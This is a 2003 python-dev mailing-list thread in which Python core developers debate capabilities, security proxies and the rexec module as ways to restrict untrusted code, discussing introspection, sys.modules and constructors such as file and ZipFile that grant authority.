This would have the effect of the "introspectable flag" that Guido mentioned, but without expending any storage at all, until you actually needed to introspect something.
You seem to be arguing that programmers should not have to explictly create capabilities, but that everythink should be a capability by default. Please correct me if I'm wrong. I thought that the main point of capabilities was that programmers *should* explictly bother to pass capabilities. Programmers should think about arguments passed to (or returned or raised to) other code as capabilities to do things and pass *just* the capabilities needed. I find a lot of appeal in this idea. Zope employs proxies in a way that falls somewhere between the extremes of capabilities and implicitly protecting everything. (I'm going to be a little sloppy hear for brevity. A Zope proxy is made up of two objects, a simple proxy that *could* be used to implement capabilities and a checker that provides policy. The policy we currently use in Zope is not a capability policy.) Zope security proxies assure that "everything" is proxied. (We choose not to proxy simple valies like numbers, strings, and None.) Values returned from operations on proxied. This maked it pretty straightforward to set up execution environments where untrusted code only has access to proxies. In addition, if untrusted code calls trusted code, the untrusted code can only pass proxies. This means that trusted code can't be tricked into performing operations that the untrusted code could not perform. Zope proxies achiev this level of automation by providing registries, mostly based on classes, that allow programmers to say how different kinds of objects should be proxied. Programmers decide what capabilities to expose at "compile" time (really program startup) rather than run time. Programmers *can* create proxies explicitly that provides non-default access. In fact, there are apis that actually provide the the equivalent of capabilities. I mention all of this because I think it's worth thinking/debating this issue about how explicit security should be. On the one hand, explictly giving *just* the capabilities needed for a task seems very appealing. OTOH, making sure that everything is protected by default is safer. I suspect that there are ways to combine (trade off?) these in reasonable ways. Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
Ka-Ping Yee wrote:
Ben Laurie wrote:
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
Guido van Rossum wrote:
Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda.
Guido's paragraph, above, seems to believe that it is. In fact, the pattern he described is a common and powerful way of using capabilities. A capability is just an unforgeable object reference. In a pure capability system, the only thing you can do with a capability is to call methods on it (or, if you prefer, all you can do is send messages to it). Interposing an object to expose only a subset of another object's API, such as a read-only subset, is exactly the power capabilities give you.
I think this is an implementation detail, as I have mentioned before. A capability is a thing with certain properties, as discussed ad nauseam. You can implement them using bound methods or using opaque objects. Personally, I'd like to do both, but if I had to choose, I'd use bound methods. Yes, this probably is a shift in position - I'm still trying to figure this stuff out, is my excuse! Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
Ben Laurie wrote:
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
Guido van Rossum wrote:
Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
(Jim surmised that I meant to write "bound methods". Alas, I don't get off that easily: at the time I wrote that I really did think that a capability had to be a single function.) [Ping]
There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda.
I guess, I misunderstood.. I was sure that Ben told me this was so. Apparently I misread, or you have a different definition of capability than he does (wouldn't be the first time.)
Guido's paragraph, above, seems to believe that it is. In fact, the pattern he described is a common and powerful way of using capabilities. A capability is just an unforgeable object reference. In a pure capability system, the only thing you can do with a capability is to call methods on it (or, if you prefer, all you can do is send messages to it). Interposing an object to expose only a subset of another object's API, such as a read-only subset, is exactly the power capabilities give you.
So a proxy with a fixed (not depending on the caller) policy about which methods you can should be considered as equivalent to a capability -- in fact this would be a way to implement capabilities.
It seems to me that the "rexec vs. proxy" debate is really about a very different question: How do we get from Python's currently promiscuous objects to properly restricted objects?
(Once we have properly restricted objects in either fashion, yes, definitely, using proxies to restrict access is a great technique.)
If i understand correctly, the "proxy" answer is "we create a special wrapper object, then the programmer has to individually wrap any object they want to be secure". And the "rexec" answer is "we create an interpreter mode in which all objects are secure".
Well, actually, restricted execution as currently implemented does *not* strive to make all objects secure: untrusted code can still inspect all attributes of an object unless that object is proxied by a Bastion, or unless that object is one of a few built-in types (e.g. bound methods) for which some attributes are privatized.
I think the latter is far better. To have any sort of real chance at establishing security, you have to start from a place where everything is secure, instead of starting from a place where everything is insecure and you have to individually secure every single object with its own wrapper.
But we don't have the latter.
The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default.
That wouldn't be Python.
Anyone wanting to do introspection would simply have to obtain the "introspect" capability from a privileged place (e.g. sys). For example,
class Foo: pass
print Foo.__dict__ # fails
from sys import introspect print introspect(Foo).__dict__ # succeeds
When running the interpreter in secure mode, "introspect" would just be missing from the sys module (again, ideally sys.introspect wouldn't exist by default, and a command-line option would turn it on, but i realize that's far away).
This would have the effect of the "introspectable flag" that Guido mentioned, but without expending any storage at all, until you actually needed to introspect something.
That flag wasn't my idea, it was some one else's (Greg Ewing?). --Guido van Rossum (home page: http://www.python.org/~guido/)
Guido:
That flag wasn't my idea, it was some one else's (Greg Ewing?).
Yes, it was my idea. I was thinking that there was already a word of flags in the object struct that might have some room left, but I may have been thinking of type objects. I'm not sure it's such a good idea now anyway. As has been pointed out, you'd still need proxies of some kind to restrict interfaces. It would just mean you'd be able to build your proxy out of any suitable type of object. The other idea was that trusted code would be able to set the flag on all the objects that it passed to untrusted code, instead of having to proxy them all. But, as has also been pointed out, that's a rather brittle way to enforce security. I think I agree that to really get on top of this security business we need to move towards having dangerous things forbidden by default rather than allowed by default. To that end, it would be useful if we could pin down exactly what's dangerous and what isn't. It seems to me that most uses of introspection by most programs are harmless. Can we sort out those (hopefully few) things that are dangerous, and separate them from the existing introspection mechanisms? Access to sys.modules has been mentioned as a key thing that needs to be restricted. Maybe this shouldn't be an arbitrarily-accessible variable? Maybe the sys module shouldn't be a module at all, but some special object that won't let you do nasty things with its contents unless you've got special privileges (which most code would *not* have by default). One of the "nasty" things would be picking the real __builtins__ out of sys.modules. Are there any others? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+
[Greg Ewing]
I think I agree that to really get on top of this security business we need to move towards having dangerous things forbidden by default rather than allowed by default.
This is more or less what the rexec module implements, except for convenience it has a list of unsafe built-ins rather than a list of safe built-in.
To that end, it would be useful if we could pin down exactly what's dangerous and what isn't. It seems to me that most uses of introspection by most programs are harmless. Can we sort out those (hopefully few) things that are dangerous, and separate them from the existing introspection mechanisms?
Maybe, maybe not. The original restricted execution code (not the rexec module) arbitrarily decided that setting class attributes was dangerous but getting them was not. Samuele found that new-style classes allow both, but always disallows write-access to the class __dict__ (you have to use the setattr protocol); this is good or bad depending on how it's used. The real problem is that harmful access may be granted via innocent-looking access. For example, allowing read-only access to a function's globals gives you access to the unrestricted 'open' function...
Access to sys.modules has been mentioned as a key thing that needs to be restricted. Maybe this shouldn't be an arbitrarily-accessible variable? Maybe the sys module shouldn't be a module at all, but some special object that won't let you do nasty things with its contents unless you've got special privileges (which most code would *not* have by default).
That's pretty much what the rexec module implements; it overrides __import__ and when you ask for sys, you get a fake sys that only contains stuff that should be safe.
One of the "nasty" things would be picking the real __builtins__ out of sys.modules. Are there any others?
Picking an unsafe extension module out of sys.modules. --Guido van Rossum (home page: http://www.python.org/~guido/)
From: "Guido van Rossum" <guido@python.org>
[Greg Ewing]
I think I agree that to really get on top of this security business we need to move towards having dangerous things forbidden by default rather than allowed by default.
This is more or less what the rexec module implements, except for convenience it has a list of unsafe built-ins rather than a list of safe built-in.
To that end, it would be useful if we could pin down exactly what's dangerous and what isn't. It seems to me that most uses of introspection by most programs are harmless. Can we sort out those (hopefully few) things that are dangerous, and separate them from the existing introspection mechanisms?
Maybe, maybe not. The original restricted execution code (not the rexec module) arbitrarily decided that setting class attributes was dangerous but getting them was not. Samuele found that new-style classes allow both, but always disallows write-access to the class __dict__ (you have to use the setattr protocol); this is good or bad depending on how it's used.
but given that methods can be overriden per instance with classic-classes: class C: def f(s): ... c=C() c.f = lambda s: s it was not so effective.
The real problem is that harmful access may be granted via innocent-looking access. For example, allowing read-only access to a function's globals gives you access to the unrestricted 'open' function...
restricted execution alone for example does not have a notion of subclassable vs. non subclassable classes, and given its approach, subclassing can be dangerous. For sure a good thing would be for func_* and im_* attributes of functions and methods to be substituted by special accessor functions/objects, indipendently of restricted mode. Function and method should be for normal code basically opaque.
From: "Samuele Pedroni" <pedronis@bluewin.ch>
For sure a good thing would be for func_* and im_* attributes of functions and methods to be substituted by special accessor functions/objects, indipendently of restricted mode.
to clarify: I mean something like func_globals(f) vs f.func_globals regards
Guido van Rossum wrote:
Ben Laurie wrote: There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda.
I guess, I misunderstood.. I was sure that Ben told me this was so. Apparently I misread, or you have a different definition of capability than he does (wouldn't be the first time.)
The thing is that a capability is a pretty abstract notion. You can implement them as classes or as lambdas - I initially did them as classes, but decided that lambdas were neater, at least in the context of Python. I could be wrong. It could just be my particular bias, which is why I'd prefer, ideally, to be able to do either. I'm sure if people want to be definition lawyers they can find documentation explaining why either of those isn't quite right, but I'm interested in functionality and the functionality is available either way. Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
On Mon, 2003-03-10 at 05:51, Ka-Ping Yee wrote:
It seems to me that the "rexec vs. proxy" debate is really about a very different question: How do we get from Python's currently promiscuous objects to properly restricted objects?
I think that's the right question.
(Once we have properly restricted objects in either fashion, yes, definitely, using proxies to restrict access is a great technique.)
If i understand correctly, the "proxy" answer is "we create a special wrapper object, then the programmer has to individually wrap any object they want to be secure". And the "rexec" answer is "we create an interpreter mode in which all objects are secure".
The proxy answer is a bit more complex. Any object returned from a proxy is itself wrapped in a proxy, except for immutable objects like None, ints, and strings. The initial proxy creates a barrier between the code that created the proxy and the client that uses the proxy.
I think the latter is far better. To have any sort of real chance at establishing security, you have to start from a place where everything is secure, instead of starting from a place where everything is insecure and you have to individually secure every single object with its own wrapper.
It would indeed be impractical to wrap every object manually. I think both approaches tend towards the design principle of fail-safe defaults and complete mediation. A proxy mediates all access to the object it wraps. By default, it allows no access. When it allows access, it creates new proxies that provide the same facilities as the original. The one exception is for immutable objects. (Immutability is good for so many reasons.)
The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default. Anyone wanting to do introspection would simply have to obtain the "introspect" capability from a privileged place (e.g. sys). For example,
class Foo: pass
print Foo.__dict__ # fails
from sys import introspect print introspect(Foo).__dict__ # succeeds
When running the interpreter in secure mode, "introspect" would just be missing from the sys module (again, ideally sys.introspect wouldn't exist by default, and a command-line option would turn it on, but i realize that's far away).
This would have the effect of the "introspectable flag" that Guido mentioned, but without expending any storage at all, until you actually needed to introspect something.
If Python's introspection were less ad hoc, I suppose this issue would be easier to tackle. (Has anyone done security design for a CLOS-style meta-object protocol?) Note that the biggest problem with the introspectable flag is that it would need to be checked all over the interpreter internals. For example, the interpreter optimisizes bound method calls by extracting the im_self and im_func and calling im_func directly passing im_self and the rest of the arguments. This is all done within the mainloop using a single type check and a bunch of macros to extract fields from the bound method. It is pretty common to use macros that depend on the representation of builtin types like functions, methods, dictionaries, etc. Jeremy
Ka-Ping Yee <ping@zesty.ca>:
The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default.
Perhaps it would be useful to distinguish between what might be called "read-only" introspection, and more powerful forms of introspection. Usually it doesn't do any harm to be able to find out things like what class an object belongs to and what methods it supports, so perhaps these kinds of introspections don't need to be restricted by default. But more intrusive things like reading/writing arbitrary attributes or calling arbitrary methods would require special permission. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+
On Tue, 11 Mar 2003, Greg Ewing wrote:
Perhaps it would be useful to distinguish between what might be called "read-only" introspection, and more powerful forms of introspection.
Usually it doesn't do any harm to be able to find out things like what class an object belongs to and what methods it supports, so perhaps these kinds of introspections don't need to be restricted by default.
A serious flaw with this particular point is that Python does not separate the identity of a class from the power to create instances of that class. Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments. -- ?!ng
[Ping]
Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments.
Assuming the Python code in the class itself is not empowered in any special way, I don't see why not. So that suggests that you assume classes can be empowered. I can see this for classes implemented in C; but how can classes implemented in pure Python be empowered? --Guido van Rossum (home page: http://www.python.org/~guido/)
On Sun, 30 Mar 2003, Guido van Rossum wrote:
[Ping]
Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments.
Assuming the Python code in the class itself is not empowered in any special way, I don't see why not. So that suggests that you assume classes can be empowered. I can see this for classes implemented in C; but how can classes implemented in pure Python be empowered?
In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type (being able to ask a file object for its type gets you the ability to open any file on the filesystem). But many Python classes are in the same position -- they acquire authority upon initialization. To pick one at random, consider zipfile.ZipFile. At first glance it appears that once you create a ZipFile object with mode "r" you can hand it off to provide read-only access to a zip archive. (Even if a security audit of the code reveals holes, my point is that the API isn't far from accommodating such a design intent.) It's useful to be able to separate the authority to read one particular instance of ZipFile from the authority to instantiate new ZipFiles, which currently allows you to open any zip file on the filesystem for reading or writing. -- ?!ng
Ka-Ping Yee wrote:
... In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type (being able to ask a file object for its type gets you the ability to open any file on the filesystem). But many Python classes are in the same position -- they acquire authority upon initialization.
Just out of curiosity wouldn't you say that part of the capability zen is that capabilities that allow you to turn global strings into objects should either not exist or be very segmented from other capabilities? (in fact I remember discussing this with you at some Python conference!) In capdesk, I believe you drag a capability for a file from one window to another so that the "drop target" never needs to know or care what the filename was. So it might be better to separate the authority from the __init__ than to separate constructors from classes. Arguably it is better to add to the library than to change the language. return securefile("foo.txt").reader() x = zipfile.Zipfile(securefile("foo.txt").reader()) Paul Prescod
[Ping]
Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments.
[Guido]
Assuming the Python code in the class itself is not empowered in any special way, I don't see why not. So that suggests that you assume classes can be empowered. I can see this for classes implemented in C; but how can classes implemented in pure Python be empowered?
[Ping]
In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type (being able to ask a file object for its type gets you the ability to open any file on the filesystem). But many Python classes are in the same position -- they acquire authority upon initialization.
What do you mean exactly by "exercise authority"? Again, I understand this for C code, but it would seem that all authority ultimately comes from C code, so I don't understand what authority __init__() can exercise.
To pick one at random, consider zipfile.ZipFile. At first glance it appears that once you create a ZipFile object with mode "r" you can hand it off to provide read-only access to a zip archive. (Even if a security audit of the code reveals holes, my point is that the API isn't far from accommodating such a design intent.)
But is it really ZipFile.__init__ that exercises the authority? Isn't its authority derived from that of the open() function that it calls?
It's useful to be able to separate the authority to read one particular instance of ZipFile from the authority to instantiate new ZipFiles, which currently allows you to open any zip file on the filesystem for reading or writing.
In what sense is the ZipFile class an entity by itself, rather than just a pile of Python statements that derive any and all authority from its caller? I understand how class ZipFile could exercise authority in a rexec-based world, if the zipfile module was trusted code. But I thought that a capability view of the world doesn't distinguish between trusted and untrusted code. I guess I need to understand better what kind of "barriers" the capability way of life *does* use. --Guido van Rossum (home page: http://www.python.org/~guido/)
Guido van Rossum wrote:
...
In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type (being able to ask a file object for its type gets you the ability to open any file on the filesystem). But many Python classes are in the same position -- they acquire authority upon initialization.
What do you mean exactly by "exercise authority"? Again, I understand this for C code, but it would seem that all authority ultimately comes from C code, so I don't understand what authority __init__() can exercise.
Given that Zipfile("/tmp/foo.zip") can read a zipfile, the zipfile class clearly has the ability to open files. It derives this ability from the fact that it can get at open(), os.open etc. In a capabilities world, it should not have access to that stuff unless the caller specifically gave it access. And the logical way for the caller to give it that access is like this: ZipFile(already_opened_file) But in restricted code
... But is it really ZipFile.__init__ that exercises the authority? Isn't its authority derived from that of the open() function that it calls?
I think that's the problem. the ZipFile module has a back-door "capability" that is incredibly powerful. In a library designed for capabilities, its only access to the outside world would be via data passed to it explicitly.
In what sense is the ZipFile class an entity by itself, rather than just a pile of Python statements that derive any and all authority from its caller?
In the sense that it can import "open" or "os.open" rather than being forced to only communicate with the world through objects provided by the caller. If we imagine a world where it has no access to those back-doors then I can't see why Ping's complaint about access to classes would be a problem. Paul Prescod
Ka-Ping Yee <ping@zesty.ca>:
On Sun, 30 Mar 2003, Guido van Rossum wrote:
[Ping]
Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments.
Assuming the Python code in the class itself is not empowered in any special way, I don't see why not. So that suggests that you assume classes can be empowered. I can see this for classes implemented in C; but how can classes implemented in pure Python be empowered?
In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type
Yes, I think the solution to this is not to forbid getting hold of the class of an object, but to design constructors so that they don't do anything that might be a security problem. In the case of files, that would mean removing the feature that file("foo") means the same as open("foo"), so that only the open() function can open arbitrary files. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+
participants (12)
-
Aahz
-
Anthony Baxter
-
Ben Laurie
-
Greg Ewing
-
Guido van Rossum
-
Jeremy Hylton
-
Jeremy Hylton
-
Jim Fulton
-
Jim Fulton
-
Ka-Ping Yee
-
Paul Prescod
-
Samuele Pedroni